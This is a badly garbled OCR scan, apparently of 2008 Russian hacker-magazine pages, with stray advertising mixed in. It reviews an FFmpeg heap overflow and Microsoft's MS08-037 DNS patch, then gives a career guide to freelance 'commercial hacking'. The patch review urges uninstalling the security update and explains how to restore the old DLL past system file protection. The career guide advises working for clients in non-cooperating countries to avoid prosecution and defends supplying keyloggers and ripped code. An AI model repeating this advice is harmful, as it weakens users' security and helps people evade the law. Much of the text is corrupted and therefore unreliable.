В ПАРСЕРЕ 5ТК- 
ФАЙЛОВ 





Поискисправлений в файле рзхзіг.с 
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Рандомизация ТХЮ в пакете М508 037, использующем функцию _Ѳе1:Па пб В ІІ5Й0 для получения совершенно непредсказуемой последовательности бит 



» Вгіе* 



Давным-давно, в декабре 2007 года, когда не росла трава и, вообще, был 
не сезон, коллектив разработчиков 0реп-5оигсе библиотеки РРтред 
совершенно случайно обнаружил ошибку в 5ТР-парсере, реализованном 
в файле рБХБіг.с. Попытка проигрывания видео-потока, определенным 
образом перемешанного с аудио-блоками, приводила к копированию их 
в конец видео-пакета, расположенного в динамической памяти, которая, 
однако, не настолько динамическая, чтобы автоматически увеличивать 
размер буфера при необходимости. В результате мы имеем классическое 
переполнение кучи, с которым активно борются разработчики операци- 
онных систем и компиляторов, но все никак не могут победить, а потому 
возможен нетолько крах, но и захватуправления сзасылкой вредо- 
носного зЬеІІ-кода. РРтред-іеат довольно быстро исправил ошибку, 
подробно описав причины ее возникновения на СѴ5 ( гоипсІир.трІаѵегЬд. 
Ьи/гоипсІир/^треа/івзиеЗ1 1 1 и даже кинул линк на образец видео-файла, 
вызывающего переполнение. Однако летом 2008 года хакеры судивлени- 
ем обнаружили, что дыра все еще актуальна, поскольку РРтед исполь- 
зуется в огромном количестве проектов (ТСсібЬоѵѵ, тріауег, ѴібеоРАЫ), 
которые обновляются довольно лениво, не говоря уже о пользователях, 
спокойно пользующихся версиями двух и даже трехгодичной давности! 

За техническими подробностями обращайся кСѴ5 [ гоипсІцр.ппрІаѵегЬд. 
Ьи/гоипбир/^треа/іззиеЗ1 1 1. а сводную информацию об ошибке легко 
найти на зесигіЫосиз.сот/ЬісІ/ЗОІ 54/іпіо . 



»ТагдеІ5| 



Популярность РРтред не знает границ! На одной лишь официаль- 
ной страничке проекта перечислено свыше сотни продуктов, ис- 
пользующих эту библиотеку в тех или иных целях Пітреа.трІаѵегЬд. 
Ьи/ргоіесіз.ЫтІ І. а сколько программистов юзаютее втихую 
(нарушая лицензию) — остается только гадать! Короче, уязвимость 
принимает едва ли не планетарные масштабы, что очень радует 
хакеров. 



» ЕхрІоіі| 



Пример «честного» видео-файла, демонстрирующего данную дыру, можно 
найти на ватрІез.трІаѵегИд.Иц/аате-і'огтаіз/рвх-вІг/Іоао.ікі. который, 
кстати говоря, может иметь любое расширение. Его необязательно скачи- 
вать перед воспроизведением на диск, так как многие программы, исполь- 
зующие РРтред, поддерживают потоковое вещание и хакеру достаточно 
всего лишьзаманитьжертву на страничку с вредоносным файлом. 



»5оІи(іоп 



Теоретически: скачать библиотеку РРтред [ ^треа.трІаѵегЬд.Ьи/сІоѵѵпІоасІ 
Мті) и загрузить исходные тексты всех используемых нами проектов, 
«завязанных» на РРтеад. Перекомпилировать их, учитывая, что огромное 
количество программ содержитзаимствованный и адаптированный под 
собственные нужны код РРтред (а потому еще нужно разобраться, как вбу- 
хатьтуда новую версию). Практически: это нереально и решения нет. 




М5 ѴѴШ00ѴѴ5 — ЗАЩИТА 
ОТРИЗ-СПУФИНГА 



» Вгіе{ 



В начале июля 2008 года Місгобоіі выпустила четыре заплатки. Три их них 
затыкают критические дыры вдовольно экзотичных системах (напри- 
мер, М55СИ-сервере), а последняя — укрепляетзащиту РЫЗ-сервера, 
ОМЗ-клиента и ВЫЗ-геБОІѵег’а отспуфинга ІР-адресов, попутно предо- 
твращая «отравление» сети поддельными ОЫЗ-пакетами, посланными 
злоумышленником. Какона эта делает? М5 08-037 раІсИ рандомизирует 
номер порта-источника для всех отправляемых пакетов, чей локаль- 
ный порт не назначен явно (как, например, у О N5), затрудняя подделку 
фальшивых 0Ы5-пакетов. Если хакеру все-таки удастся ввести жертву 
в заблуждение, то пользы от этого будет немного, поскольку М5 08-037 
раісЬ предусмотрительно вырубает 0Ы5-кэш. Вот просто берет и выруба- 
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Генерация ОЫЗ-запросов при отключенном 0Ы5-кэше 



ет. И плевать ему на то, что при этом падает производительность! 
Плевать на то, что машина с отключенным ОЫЗ-кэшем генерирует 
гораздо больше ОЫЗ-запросов и потому вероятность«словить» 
поддельный пакет намного выше, чем прежде! Главное — создать 
видимость защищенности, а для полноты картины в обновленной 
библиотеке БЫЗАРІ . ШЬ радикально изменен экспорт. Одни АРІ- 
функции добавлены, вторые — удалены, третьи — переименованы. 
Например, Бпз_Сас]те5оскекІпік ( ) превратилась в ЗоскеС_ 
Саскеіпік ( ) , Бпз_0репНозкРі1е ( ) в НозкзРі1е_0реп ( ) и 
т.д., ит.п. Впрочем, все зависит от версии системы и установленных 
заплаток. Самое забавное, что М5 08-037 раісб тактично «забывает» 
изменить импорт библиотек, ссылающихся на Б№АРІ .БЬЬ. В итоге, 
некоторые приложения (втом числе, написанные самой Місговок и 
поставляемые вместе с системой, вроде сіпзгзіѵг . <3.11) перестают 
работать. На этом фоне баги наподобиеупомянутого в описании 
заплатки ключа ЗоскеіРооІЗке, задающего размер пула сокетов 
(а в действительности никакие используемого), выглядят вполне 
естественно, подумаешь, мелочи какие! За более подробной (но и бо- 
лее брехливой) информацией обращайтесь непосредственно к М5: 
тісгозоіксотЛесНпеІ/зесигііѵ/ЬиЦеііп/тзОЭ-СЩ.тзрх и зиррогк 
тісго5ок.сопп/кЬ/953230 . 




АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ! 



€ п н'циал ынсе предложение: 



ТСПРгііПЫ ИНТЕРНЕТ 

Ь 1 1 ь Ч* V II ПОДКЛЮЧЕНИЕ БЕСПЛАТНО 



“■ Псднл юпсннс * в лм-б-ок месте 
М □ •= К II к I И Москапскаи обп. 



- Срсгк Но дкги-очонмй в МоскГіе - 14 диен, 



» Тагдеізі 



Согласно бюллетеню безопасности М508-037, угрозе ОЫЗ-спуфинга 
подвержены следующие системы : ѴѴ2К5Р4, ѴѴ2К5Р4 Зегѵег, ХР 5Р2/ 
5РЗ, ХРх64/ХРх645Р2, 52К35Р1/5Р2, 52КЗх64/52КЗх645Р2, Капіит 
52К35Р1/5Р2, Ііапіит 52К8/52К8х64. Виста числится в списке неуяз- 
вимых, что оченьстранно, если не сказать — подозрительно. 



ѣ аёл, -от 14 ЭФ дней. 

- ѴдГяновкА Гі-рнк*! о чіосОпСяВДа Г вй с фе м но Г о н-Рморв 



|» ЕхрІоіі| 



Любая программа, написанная для йЫ 5-спуфинга без учета осо- 
бенностей реализации конкретной системы. В этом смысле очень 
хорошо подходят йЫЗ-спуферы, написанные для атакна ВЗй (напри- 
мер . абтігееІзб.пеі/АРМ/АРМІР.М І. 



»5оІи1іоп 



Не устанавливать М5 08-037 раісб, а если установка осуществлялась 
автоматом, то снести его к чертовой матери. 



* М мог окай альные телефонные 1 номера 

- I Р - г с л с ф □ н и и 

■ ВыДч*ЛйНнь(-і Линии ИнТАрНАТ 
* Корлсратинммо ЧПС1Н|.ІС< 5 ИТ И (ѴРМІ 



>>РиІІ сПзсІозе 



Что же скрывается внутри заплатки под кодовым именем М5 08-037? 
История эта началась не вчера и даже не позавчера, а намного ра- 
нее. Несмотря нато, что уязвимости присвоен статус «критической», 
здесь нет никакой дыры, которую бы следовало срочно затыкать, тем 
более, что патч М5080-037 дает прямо противоположный эффект 
— он ослабляетзащиту и вызываетощутимыетормоза. А потому, его 
выход на «арену» сопровождался громким вздохом всех специалис- 
тов по безопасности: «РЫ5 зрооГіпд? оЫ пор адаіп!». И ведь их можно 
понять! М іеговой движется от плохого к худшему. 

Поумолчанию РЫ5 функционирует на базе протокола ІЮР, рабо- 
тающего без установки соединения — система просто посылает 
РЫ5-запросы и ожидает ответный пакет. Для генерации поддельного 
РЫ5-ответа атакующему достаточно подделать 16-битный номер 
последовательности Тгапвасбоп ІР (ТХЮ) и 16-битный номер порта- 
отправителя. В древних версиях ѴѴІпбоѵѵз оба значения были вполне 
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Хвалебное описаниезаплатки М508 037 на блоге МісгозоК 



предсказуемы и угадывались чуть ли не с нескольких попыток. «Угадыва- 
лись», естественно, только при атаках на локальную сеть извне. Внутри 
локальной сети ничего гадать не нужно. Достаточно запустить снифер и ло- 
вить ВЫЗ-запросы, немедленно генерируя подложные ОЫЗ-ответы с «ле- 
выми» ІР-адресами, на которые требуется за манить жертву. Понятное дело, 
что подложный пакет должен прийти раньше настоящего, а потому атака на 
жертву обычно сопровождается атакой на ОЫЗ-сервер, выводящей его из 
строя или вызывающей перегруз. Кстати говоря, от«внутренних»атак М508 
037 раісб не защищает и даже не пытается. 

«Внешние» атаки намного более сложны в реализации. Во-первых, хакеру 
приходится заниматься гаданием на кофейной гуще, отравляя большое 
количество пакетов, чтотутже просекаютсистемы обнаружения вторжений. 
Во-вторых, узлы локальной сети редко имеют прямой доступ «наружу». 
Обычно они спрятаны за Ргоху/ЫАТ’ом и «запитаны» либо отсвоего 
собственного ОЫЗ-сервера, либо ОЫЗ-сервера провайдера, который, 
в свою очередь, обращается каплинку или корневым ОЫЗ-серверам. 

Хотя, в принципе, корневые доменные сервера общедоступны и к ним 
может обращаться любойжелающий (я именнотаки поступаю, забивая на 
глючный ОЫЗ-сервер своего провайдера). В целяхоптимизации локаль- 
ный ОЫЗ-сервер (да и ВЫЗ-гезоІѵег, встроенный в операционную систему) 
кэширует ОЫЗ-ответы, предотвращая многократную посылку одних итехже 
запросов. 

С одной стороны, это затрудняет атаку, поскольку, чем реже жертва от- 
правляет ВЫЗ-запросы во внешнюю сеть, тем реже она слушает ответы, 
и, соответственно, шансы хакера падают стремительным домкратом. 

Ему на пальцы. Чтобы не вредничал. Но если развернуть медаль другой 
стороной, то получается, что ОЫЗ-сервер провайдера представляет 
собой отличную мишень. Достаточно, чтобы машина приняла хотя бы 
один-единственный подложный пакет, который тут же попадет в кэш, и 
ОЫЗ-сервер на запросы всех клиентов будет возвращать «хакнутый» ІР- 
адрес, оседающий в кэшах рабочих станций и локальных ОЫЗ-серверов. 
На профессиональном жаргонетакой беспредел называется «отравле- 
нием» (ОМЗ-роІБОпіпд). Чтобы его предотвратить (по уму), достаточно 



сделать номер порта источника и ТХЮ трудно предсказуемыми. 

До недавнего времени ЫТ(и производные от нее системы) использовала 
простой алгоритм, основанный на внутренних часах и генерирующий впол- 
не предсказуемую последовательность, описываемую функцией времени. 
Послетого, как некоторые эксперты по безопасности указали на теорети- 
ческую возможность вычисления номера последовательности, М3 сначала 
категорически не соглашалась с «предъявой», а потом разозлилась и 
всобачила в БЫЗАРІ . БЬЬ криптостойкую функцию СгурОСепКапйош ( ) , 
генерирующую абсолютно случайную последовательность бит. Если же 
вызов СгурОСепЕапсіот ( ) обламывается, то вызывается штатная Си- 
функция гапсі ( ) , которой, впрочем, более чем достаточно. Однако М3 
тщательно скрывает этот факт от общественности, расписывая достоинства 
СгурОСепКапйош( ) и совершенно не упоминая гапй ( ) : Ыоаз.ІесЬпеЕ 
сот/5Уѵі/агсЫѵе/2008/04/09/тз08-020-Ьоѵѵ-ргебісіаЫе-І5-іЬе-бп5- 
ігапзасбоп-іб.азрх . 

С установленной заплаткой М508-020, выпущенной еще в начале 2008 
года, сгенерировать подложный ОЫЗ-пакет практически нереаль- 
но (хакеров-телепатов мы в расчет не берем). Но М3 пошла дальше, 
выпустив еще один пакет обновления — М508 037, рандомизирующий 
нетолько ТХЮ, но и номер порта-отправителя, который прежде «тупо» 
увеличивался на единицу. Точнее, увеличивался на единицу до тех 
пор, пока не встречал первый попавшийся свободный локальный порт. 
На практике номера портов источников ОЫЗ-пакетов были далеки от 
«правильной» арифметической прогрессии. Впрочем, рандомизация 
карман не тянет. 

А вот отключение ОМЗ-кэша — это просто ужас, летящий на крыльях ночи. 
Интересующихся техническими подробностями отправляю кфункции 
БЫЗАРІ ! Бпз-СасІтеЗоскеЦіпіЦ/ЗоскеС-СасЬеіпіІс, а здесь объ- 
ясню процесс на пальцах. Черте ней, сдеградацией производительности. 
Ну, будет сервер лазить каждый раз за ОЫЗ-ответом во внешнюю сеть, 
дожидаясь ответа, — ну и ладно. Это противно, но не смертельно. То есть, 
еще как смертельно! Чем больше ОЫЗ-запросов генерирует жертва, тем 
выше вероятность подсунуть ей подложный ОЫЗ-ответ, а потому М508 037 
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Фрагмент внутрифирменного отчета (сіаззібесі іпію) по исследованию воздействия 



раІсЬ реально вредит, и чем скорее мы его снесем —тем лучше. Акакего 
снести, если мы отказались от возможности деинсталяции? Берем дист- 
рибутивный диск, достаем оттуда оригинальную ббзарі . БЫ, и заменяем 
ее: как в системном каталоге ѴѴІп б оѵѵз, так и в 5 РС- кэше, иначе 5 РС ее тут 
же восстановит. Для замены файлов необходимо либо грузиться с ЫѵеСБ, 
либо переименовать ББЗАРІ . БЫ в ББЗАРІ . БЫ, положить рядом 
ББЗАРІ . БЫ из дистрибутива и перезагрузиться (наверняка ты знаешь, 
чтоѴѴІпбоѵѵз блокируетудаление/перезапись загруженных БІ_І_, но не 
препятствует их переименованию), ил 
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ПРИКЛАДНЫЕ АСПЕКТЫ КОММЕРЧЕСКОГО ВЗЛОМА 



^ ВЗЛОМ 



Стабильно хакерствовать и получать постоянный доход — намного интерес- 
нее, чем шить шаровары или протирать штаны в пыльной конторе, общаясь 
с людьми, которых совсем не хочется видеть. Большинство ходит на работу 
не из любви к ней, а по необходимости. Хакеры относятся к тем немногочис- 
ленным счастливчикам, на которых это правило не распространяется. 

Вот только как найти свое место под звездами? 



В этой статье автор обобщил весь свой многолетний опыт поиска удален- 
ной работы по взлому программ. 

Н ТЕХНИКА БЕЗОПАСНОСТИ ИЛИ СЕКС БЕЗ ПРЕЗЕРВАТИВА 

Прежде, чем говорить о вещах, граничащихс нарушением закона, неплохо 
бы полистатьУК и ознакомиться с практикой судопроизводства. Например, 
обратиться кзнакомому журналисту, ведущему криминальную хронику. Сам 
по себе УК — это просто куча страниц для нужд личной гигиены. Написан- 
ное пером — одно, а вот его практическое применение — совсем другое. В 
борьбе за выживание гораздо важнее знать статистику реальных судебных 
решений потем или иным делам, а вУКона не фигурирует, и добытьее, 
читая популярную литературу, невозможно. 

Компьютерные преступления вообщетрудно доказуемы и практически 
ненаказуемы, если, конечно, не говорить о явном вандализме, краже бабла, 
торговле заведомо вредоносными программами ит.д. В ситуациях, касаю- 
щихся денег, органы правопорядка всех развитых страх активно сотрудни- 



чаютдругс другом. Хакеры палятся с ультрафиолетовой скоростью, после 
чего начинают отмазываться по всем статьям, которых на момент предъ- 
явления намного больше одной — обычно, прежде чем постучать в дверь 
(сапогами), человека долго «пасут», собирая доказательства. 

На форумах некоторые смешные люди обсуждают не менее смешные 
способы уничтожения винта в случае взятия на абордаж. Глупые. Не знают, 
что винт (даже изъятый надлежащим образом) ничего не доказывает. А вот 
его уничтожение — косвенное подтверждение собственной вины Хотя тут 
можно попытаться отмазаться, сказав, что работал с конфиденциальной 
информацией, которую нельзя разглашать. Потому и соорудил систему 
уничтожения винта, а людей в погонах принял за переодетых бандитов, 

— вот и дал команду на самоуничтожение. 

Но это все ерунда. Говорить о криминале мы не собираемся и, ужтем более, 
не будем давать советов, какобойти закон, используя дыры вУК. Ни в одном 
нормативном документе термина «хакер» нет, да и само понятие «хакерс- 
тва» — растяжимое. Тем не менее, даже формально невинные деяния 
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(вроде нашумевшего дела Склярова) могут повлечьза собой далеко идущие 
последствия. Как их избежать? 

В реальной жизни функции сохранения нет, прививку от спецслужб не 
сделаешь и презерватив никуда не натянешь, а, значит, риск«залететь» 
есть всегда. Полностью нейтрализовать его нельзя, но свести к минимуму 
вполне возможно. Вотнесколько правил, призванных обеспечить хакерс- 
кую безопасность вусловияхдикой природы. 

1. Работай только на зарубежных клиентов, дислоцирующихся в странах, 
наплевательски относящихся кхакерству и находящихся если не в оппози- 
ции с Россией, то, во всяком случае, не идущиху нее на поводу, например: 
Кабул, Иран, Непал, Ливан, Южноафриканский блок. И нечего тут сме- 
яться. Компьютеры у них есть и потребность в хакерах — огромна! Кстати, 

в Южной Африке белых намного больше, а негров даже меньше, чем в 
Северной Америке. Хай-тектам имеется. Пусть спецслужбы классифици- 
руют некие деяния как«преступления», — сам черт не разберет, законы 
какой страны пострадали больше всего, да и бюрократической волокиты 
тут немеряно. Даже если действовать под своим реальным именем, риск 
«залететь» все равно нулевой. 

2. Сотрудничай только с крупными компаниями, а не отдельными индиви- 
дуумами. Чем компания крупнее, тем менее значим совет №1 , поскольку 
фирме, нуждающейся в хакерских услугах, дешевле нанять адвоката (а 
чего его нанимать? юридический отдел и та к за ни мает целый этаж), чем 
оплачивать эту же работу заново, нанимая другого хакера. Да и потом, 
если задержанный «преступник» откроет рот, сказав, что просто выполнял 
задание фирмы, не ведая, что творит — фирме по-любому придется отма- 
зываться. А единственный способ отмазать себя — это оправдать хакера, 
доказав, что никакого преступления вообще не было и это все злостные 
нападки конкурентов, которым мы сейчас предъявим встречный искза 
нарушение патентных прав, моральный ущерб и упущенную выгоду. Так 
что, с дополнительными мерами предосторожности можно сотрудничать и 
со Штатами, не говоря уже про Китай и прочие азиатские страны. 

3. Всегда отказывайся отзаказов, которые дурно пахнут, особенно если 
клиент открытым текстом говорит, зачем ему потребовалось три тонны 
тротила или эмулятор для банковских смарт-карт. Этолибодебил (клиентв 
смысле), либо ловля на живца (что встречается реже, но все-таки встреча- 
ется). Исходи из презумпции невиновности, которую со времен ее декла- 
рации никто не отменял. Если человеку нужен клавиатурный логгер, то... а 
почему бы и нет? Что в этом незаконного такого? Например, я могу ставить 
на свою собственную машинулюбые логгеры, какие только захочу. Может, у 
меня провалы в памяти или интерес посмотреть, какая сволочьустраивает 
на рабочем столе кавардак всякий раз, когда я отлучаюсь от своего ПК. 




Попробуй-ка захачить китайский зіиіі 



Администратор локальной сети, устанавливающий логгер, возможно, и 
совершает противоправное действие, нотут нужно служебную инструкцию 
читать — и в любом случае, за это действие отвечаетон, но не создатель 
девайса . Аесли кто-то с помощью логгера стырит номера кредитных карт, 
пароли и прочую секретную информацию — вот пускай и отвечает по всей 
строгости закона. Посколькулоггер не является вредоносной программой 
в чистом виде (а как насчет макросов? макро-рекордеры — ну чем они не 
логгеры), то создатель программы никакой ответственности не несет (при 
условии, что он не в сговоре), хотя потрепать нервы могут. 

Н МІЫІМАЬ 5У5ТЕМ КЕ01ІЕ5Т 

Какими знаниями/опытом/навыками должен обладать хакер для продол- 
жительного хачинья? В первую очередь, — знать язык. Нет, не ассемблер и 
даже не Си. Английский разговорный. Без словаря. Необходимоуметь не 
только бегло читать сложный технический текст, вникая в него по ходу дела, 
но и свободно изъясняться в формальной и неформальной переписке. 
Также (если фирма действительно крупная) следует быть готовым к длинной 
серии продолжительныхтелефонных интервью. Фирмы поменьше, чтобы 
нетратиться на звонки, предпочитаютбТаІк — разборчивость речи чуть 
похуже, зато все непонятные (на слух) слова можно ввести в окне текстового 
чата. Тоже самое относится ксловам, которые мы знаем, как пишутся, но 
не можем их произнести. Значит, навыкбеглого письма обязателен, плюс 
умение воспринимать речь на слух. 

Хотя, что касается слуха, — тут все от собеседника зависит. В частности, 
слово Авіа испанцы произносятпо буквам, каконо написано («Эсиа») — и 
ужасный русский акцент им не помеха. А вот американцы совершенно 
не въезжают, потому что Азия у них звучит, как«Эйжа», что очень силь- 
но напрягает поначалу. Потому перед первымителефонными интервью 
настоятельно рекомендуется продумать, какие словам могут встретиться в 
разговоре, заглянуть в словарь на предметтранскрипции, а для надежнос- 
ти — прогнатьтекст на одной из программ-говорилок. Сервис ІтТгапзІаІог 
3.2 ( ѵѵѵѵѵѵ.отпідІоЕсот/ІіпквЛгапвІаІіоп.Ыт ) вполне сносно говорит на куче 
языков и неплохо переводите китайского на английский. 

Кстати, при всемуважении к народу Поднебесной, понять иханглийский 
(какписьменный.такиустный) намного сложнее, чем китайский. Ктомуже, 
ковырять китайскую программу беззнания языка —легче на якорной цепи 
повеситься. Куча кнопокс иероглифами и совершенно непонятно, на какую 
нажимать. Впрочем, если только текст не представлен в графическом виде 
— его легко рипнутьлюбой подходящей программой (на худой конецсойдет 
и М5 Зрухх, входящий в штатный комплект поставки М5 ѴізиаІЗішсІіо). 

После чего загнать в словарь, например, в уже упомянутый ІтТгапвІаіог. 
Базовых иероглифов нетакужи много. Они быстрозапоминаются, правда, 
чтобы операционная система научилась их отображать для неуникодовых 
программ, необходимо загрузить языковый пакет и правильно настроить 
локаль. Нуда, это тема отдельного разговора. 

Тайский язык иероглифическое письмо не использует. Их азбука намного 
ближе кевропейской, хотя с непривычки выглядитустрашающе. Совре- 
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ОрепНСЕ.огд — серьезный интернациональный сайт для серьезных 
хакеровИ 



[Один из основных инструментов хакера. Зовут Ольга 



НІГААІ 

НІ7ИІІ 

■ РѴі-к-Ш/ 



менный малайский вообще использует латиницу, такчто единственный ба- 
рьером в постижении языка оказывается словарный запас и его тональная 
природа, при которой длительность гласных имеет решающее значение, 
зачастую меняющее смысл фразы на противоположный. Но ко всему этому 
быстро привыкаешь. 

А вот а рабскую вязь я все никак не могу осилить, особенно если учесть, что 
она построена на концепции узлов, допускающих существенную трансфор- 
мацию символов — воти попробуй разбери, что тут написано, а разобрать 
надо, потому какарабский — весьма популярный язык. На нем говорит до 
фига потенциальных работодателей. 

Конечно, можно ограничиться одним лишьанглийским, но самых«жир- 
ных» клиентов мы отсечем. Возникает резонный вопрос — а нелучшели 
потратить время на изучение китайского хотя бы на самом фундаменталь- 
номуровне, чем корячиться долгие годы на дешевыхзаказах? 

Впрочем, каждый решает сам, с кем ему дружить, и что ему учить, так что 
закрываем эту тему и возвращаемся к языкам программирования. 

Н НЕ АССЕМБЛЕРОМ ЕДИНЫМ 

Хакер, незнающий ассемблера, это нехакер. В основном, конечно, спрос 
на х86/х86-64 системы, однако, довольно часто приходится сталкиваться 
и с микроконтроллерами со стертой маркировкой или заказными чипами 
с неизвестным набором команд — документации либо вообще нет, либо 
она отдается только под строгую подписку за немереные деньги и только 
юридическим лицам, да и то не всем. Как быть, что делать? Отказаться от 
заказа? Ну, отказаться мы всегда успеем. Систем команд разработано не 
такужи много и крайне маловероятно, что заказной чип будет и меть уни- 
кальную систему. Скорее всего, это окажется производное чего-то хорошо 
известного с небольшим количеством действительно новых инструкций, 
назначение которых вычисляется эвристическим путем. Дизассемблиро- 
вание проши вок заказных чипов — вполне реальное дело; главное, уметь 
писать процессорные модули для ЮА Рго и знать язык основных чипов. 

Но ассемблер — это нижний уровень. На верхнем находится... нет, совсем 
не приплюснутый Си, а все больше Перл, Питон или типа того. Вот еще Руби 
появился, чтобы ему было пусто. Кому нужна эта, извините за выражение, 
хрень? Ведьто же самое можно реализовать и на Си даже с большой эффек- 
тивностью. Увы! Если клиент хочет получить программу на Питоне, прихо- 
дится подстраиваться под его требования или... послать такого клиента в 
лес, туда, где лоси. И все было бы хорошо — да только желающих получить 
ргоо^-о^-сопсер* на Питоне (Перле, Руби] с каждым годом становится все 
больше и больше. Интерпретируемые языки представляют собой явление, 
с которым нельзя не считаться. Особенно, если вспоминать про регулярные 
выражения, используемые и для сигнатурного поиска малвари. Вполне 



распространенное явление — появилась малварь, которую пока никто не 
ловит, а мы уже расковыряли ее и готовы предложить готовый детектор. 
Воттолько если у клиента имеется своя собственная система обнаружения 
вторжений, основанная на Перле/Питоне, то наш сишный модуль останется 
невостребованным. Пусть он работает в сто раз быстрее, но в чужой монас- 
тырь со своим уставом не ходят. 

С другой стороны — нельзя объять необъятное. Лучше знать свое дело 
(и делать его хорошо), чем хвататься за все подряд и плодить косяки, как 
пьяный шпалоукладчик, подрывая свою репутацию и отлавливая только те 
заказы, от которых отказались все остальные, уважающие себя хакеры. 

Н ЗЛАЧНЫЕ МЕСТА АНДЕГРАУНДА 

Где искать заказы? В интернете, а где же еще! Ну, это понятно, что не в 
брачном агентстве, но все-таки, нельзя ли конкретнее? Как насчет хакер- 
ских форумов? Там же тусуется толпа народа! Вотименно, что «толпа» и 
что «тусуется». В основном идет сплошной треп. Бродят по форуму разные 
люди с просьбой: дайте денег на гравицапу от пепелеца и ведут себя, будто 
мы пытаемся им что-то продать. Так что, это даже не вариант. Поиск кряков, 
просьбы взломать чей-то почтовый ящик/веб-сервер или наточить грабер 
паролей. В этом тухлом омуте нормальная рыба не плавает. Хотя не все 
форумы одинаковы. На ѵѵѵѵѵѵ.орепгсе.огд . ѵѵѵѵѵѵ.геѵегве-епдіпеегіпд.пеі: . 
ѵѵѵѵѵѵ.ѵѵоосітапп.сот встречаются весьма серьезные заказчики, обычно 
размещающие объявления в коммерческих разделах и позиционирующие 
себя какфирмыпо безопасности. 

Слово «фирма» — ключевое. Это не лось и не иголка в стоге сена. Она либо 
есть(итогда о ней легко собратьобширную информацию, порывшисьв 
Гугле), либо нас просто дурачат, то есть разводят, как лохов. Или эта, с поз- 
воления сказать, «фирма»только вчера образовалась и потому идетлесом. 
Кадровые агентства при всей своей бесполезности иногда даютхоро- 
ший улов. То же самое относится к разделу «.іоЬб» на ЗесигТу Госиз, 
однако намного выгоднее выходить на известные фирмы напрямую, 
смотреть, что они пишут в разделе сагеегз на своих сайтах и предлагать 
услуги, что называется, из первых рук. Просто замечательно, если часть 
персонала фирмы уже знает нас по постам на форумах и не просто знает, 
а находится в теплых дружеских отношениях, что существенно упроща- 
ет получение заказов. 

Собственно, основная часть заказов находится череззнакомых и стече- 
нием времени их число растетв геометрической прогрессии. Количество 
предложений взрывообразноувеличивается, позволяя нам выбирать на- 
иболее вкусные, интересные и питательные. Правда, это будет не сейчас и 
даже не завтра. Аочень сильно «потом». Начинать всегда сложно, но даже 
плохое начало зачастую оборачивается оченьудачным концом. 
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'.геѵегзе-епдіпеегіпд.пеі — еще одно интернациональное хакерское 
сообщество 

Н НА ХАКЕРСКОМ РЫНКЕ 

Мы бродим среди стеллажей с товаром, то ныряя в подпольные склады, то 
выныривая обратно кслепящим витринам мега-корпораций. Кто все эти 
люди и чего им отнас нужно? Искателей крэков, вирусов, троянов и прочей 
нечисти мы (какуже говорилось) отбросим сразу. Пусть с ними имеют секс 
другие. Нас интересуют серьезные предложения от серьезных компаний, 
занимающихся легальным бизнесом. 

Анализ коммерческого программного обеспечения на предмет поиска 
украденных фрагментов кода или несанкционированного использования 
патентованных алгоритмов — весьма популярнаятема и суммы там фигури- 
руют с тремя нулями сзади и двумя цифрами спереди. И все это в долларах, 
если не в евро. С юридическойточки зрения, законы ряда стран запрещают 
дизассемблировать код, если на то нет соответствующего разрешения от 
правообладателя. Замечательно! У нас стырили алгоритм и теперь юзают 
его без выплаты отчислений, а мы даже не можем их прищемить. То есть, 
еще как можем! По российским законам дизассемблирование возможно и 
без получения разрешения, поэтому западные компании очень часто нани- 
мают русских хакеров, чтобы поковыряться в коде конкурентов. 

Найти похищенный бинарный модуль (пусть и хорошозапрятанный) — ми- 
нутное дело, даже если он слегка изуродован. А вот с поиском алгоритмов 
дела обстоят гораздо сложнее. Хакер находится в кромешной тьме, совер- 
шенно не понимая, откуда начинать движение и что именно следует искать. 
Алгоритм (патентованный) — это ведь не пошаговая стратегия и вариантов 
реализациитутнамногобольшеодного и все они завязаны на математику. 
На низкомуровне (отдельных машинных команд) тут ловить нечего. При- 
ходится абстрагироваться от деталей и рисоватьзапутанные диаграммы, 
отображающие ход выполнения программы в наглядной форме. Воттут-то 
все патентованные (и непатентованные) алгоритмы и выплывают. Если, 
конечно, хакер распознает их среди нагромождений квадратиков и паутины 
стрелочек. Задача сложная, нохорошо оплачиваемая и представляющая 
собой настоящее испытание, что реально притягивает и завораживает. 
После этого «подъем» бинарного кода до компилируемых исходников 
покажется детской забавой. Воттолько не надо пытаться сплавить клиенту 
результат работы Нех-Рауз или другого декомпилятора. Во-первых, это 
не есть исходныетексты, во-вторых, они не компилируются, а если даже и 
компилируются, то программа падаетеще при запуске. Конечно, никто не 
требует снабжать каждую строку комментариями, но реконструированный 
исходный текст должен быть понятен прикладному программисту. Компи- 
ляторы (оптимизирующие) любят реализовать выделение памяти через 
умножение (у команды тиі легко отловить переполнение, преобразовав 
указатель к нулю, сигнализирующему, что на память нас обломали) или 
выбрасывать исключение с помощью деления, причем не на нуль, а опять- 
таки путем переполнения. В исходном коде ниумножения, ни деления, 
понятно, не ночевало. Там былотривиальное ветвление — проверка ука- 
зателя на равенство нулю. Воттолько современные процессоры ветвления 
не любят, и компиляторы стремятся избавиться от них везде, где это только 
возможно. Но это уже детали. В целом, ручная декомпиляция программы 



И;! пзіі I м Ьлпі-п і 1 - Ряг 



“Ѵі Іігііянм-ыпм мі. ЗъГЬГіин Гі і 












Правильно настроенная ХР способна отображать иероглифы где угодно 

— дело простое (а потому и сравнительно низко оплачиваемое), но отни- 
мающее кучу времени, чтоделаетего малопривлекательным занятием для 
опытныххакеров. Иногда, вместо подъема программы до исходныхтекстов, 
предлагают«рипанье» бинарного кода с последующим оформлением его 
в виде динамической библиотеки с документированным интерфейсом, то 
есть с описанием прототипов всех функций. Оплачивается это еще хуже, 
однако, требуетсравнительно немного времени. На вопрос, кому изачем 
может потребоваться рипать код — лучше даже не искать ответа. Гораздо 
важнее, что рипанье само по себе ненаказуемо и правонарушение совер- 
шаеттот, кто использует рипнутый код в своих продуктах, а потому частным 
требованием заказчика становится шифровка кода. 

Особняком стояттесты на проникновение и поискуязвимостей. С одной 
стороны, это самый легальный вид хакерской деятельности из всех возмож- 
ных, с другой же, если перечисленные выше способы дают гарантирован- 
ный приход, то здесь оплачиваются только найденные дыры, которых может 
не быть вообще, а времени на поискубито столько, что просто жалко стано- 
вится. Короче, дыры — это для азартных игроков. Если отвлечься от негати- 
ва и посмотреть на мир глазами оптимиста — дыры есть практически везде 
и очень многие из них находятся буквально за считанные минуты (и это не 
преувеличение), особенно если методика поиска тобой уже отработана. 
Также неплохо идут на рынке реконструкции сетевых протоколов с интер- 
фейсами динамических библиотек, форматов файлов ит.д. Существуют 
целые фирмы, специализирующие на создании игровых читов и ботов. 
